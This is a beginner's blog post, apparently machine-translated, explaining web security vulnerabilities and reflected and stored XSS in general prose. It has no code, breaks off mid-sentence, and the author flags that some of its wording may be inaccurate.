[RUBY] Security in web applications

Developing web applications without security measures is extremely dangerous. What is security? If you do not take security measures ・ Why is it dangerous? ・ What will happen ・ How to take measures I have summarized what I learned about. (Development in Ruby)

Premise
Programming beginner(1~2 months) is what I learned.
It may not work in the actual field or may contain incorrect content.
I would appreciate it if you could add or point out any mistakes or shallow parts.

Why is it dangerous without security measures?

Why are web services without security measures dangerous and what happens? ** Conclusion ** The user leaks personal information. The administrator can tamper with the web page without permission.

If you look a little closer, ・ Personal information can be viewed without permission ・ The contents of the web page are tampered with ・ The web page itself becomes unavailable as a result ・ Major damage to web service users ・ Lose social credibility of published web pages

What is security in web services?

Vulnerable web services are less secure.

Vulnerability

Vulnerabilities are also called security holes and are possible defects in software or problems in use. It is a weak point when an attack is launched by a malicious person. This vulnerability causes various damages to both developers and users.

Types of security attacks

・ Security attack by JavaScript ・ Attack using session ・ Attack that makes an illegal request ・ SQL attack Think of an attack as an act of extracting personal information.

JavaScript attack

JavaScript is a client-side programming language. By embedding malicious JavaScript in some way, you can force the user to run the program when the embedded page is displayed. This type of attack method is called XSS (Cross-Site Scripting). Embedding a script and executing it is called scripting. Most of the content seems to send personal information to the server of a malicious person.

JavaScript attack

JavaScript is a client-side programming language By somehow embedding malicious JavaScript in the browser where the user displayed the web application, the user can be made to execute the program. Such an attack is called ** XSS **

XSS (Cross-Site Scripting)

A method in which an attacker embeds a malicious JavaScript program (script) on a vulnerable web application and attacks the user of the site. XSS is a technique whose goal is to execute a malicious script when a web application is displayed. Embedding a script and executing it is called "scripting". Many of the contents are scripts that send the user's personal information to the server of a malicious person.

XSS attack pattern

There are two types of XSS attack patterns: reflective XSS and retractable XSS.

Reflective XSS

A technique that allows a script to be executed on a vulnerable web application when a user clicks on a malicious URL procedure ① Let the user click the URL An attacker causes a user to click on a malicious URL (a modified URL that transitions to a vulnerable web application). → Is the vulnerable application a source of attackers? Or is it a completely unrelated site? If the former is convincing, if the latter, the latter site is only used due to weak security? (2) When the user clicks, the script runs on the vulnerable web application. Malicious URLs contain scripts that fire on vulnerable web applications. Therefore, when you open a vulnerable web application, the script fires. ③ When the script fires, personal information is sent to the attacker's server. The script that fired (triggered) was like extracting personal information. The personal information of the clicked user will be recorded on the attacker's server.

In this way, when a URL is clicked and a response is received, the script is executed immediately, so it is called a reflective type. The script is executed after transitioning from another site (including email) to a vulnerable web application. If the URL is often posted on a chat app, before clicking on that page Is it a safe site? I think you will get confirmation. In order to prevent this reflective XSS, I think that it is displayed. This means cross-site scripting cross-site (cross-website).

Retractable XSS

An attack method that embeds a malicious script in a post of a vulnerable web application and fires the script when the user visits the web application. For example, post a malicious script on a twitter post. The script will fire as soon as you move to the page where you can see the post. Even if you don't try to see the post, you will be attacked the moment you open the page with the post. procedure ① Attacker posts with a script to a vulnerable web application Embed a script when posting content from a form. (2) When the user visits the page with the post, the script fires. When you open a post page with an embedded script, the script fires. Sometimes the script fires when you hover your mouse over the image. ③ When the script fires, personal information is sent to the attacker's server. It is called a storage type because it stores a script in a vulnerable web application and fires it when the user visits it.

Dealing with XSS

Many cases of XSS are still reported. XSS accounts for the largest proportion of the damage caused by attacks that create vulnerabilities.

Workaround

The main reason why XSS occurs is that the script tags (

Recommended Posts

Security in web applications
Remote debugging of Java applications in Azure Web Apps
Create API key authentication for Web API in Spring Security
Easily develop web applications with STS and Spring Boot. In 10 minutes.
Automatically deploy Web applications developed in Java using Jenkins [Tomcat application]
Building Java Web Applications on Windows Server 2016
Creating Java Web Applications to Azure Web Apps
Try with resources statement in web app
Role of JSP in Web application [Java]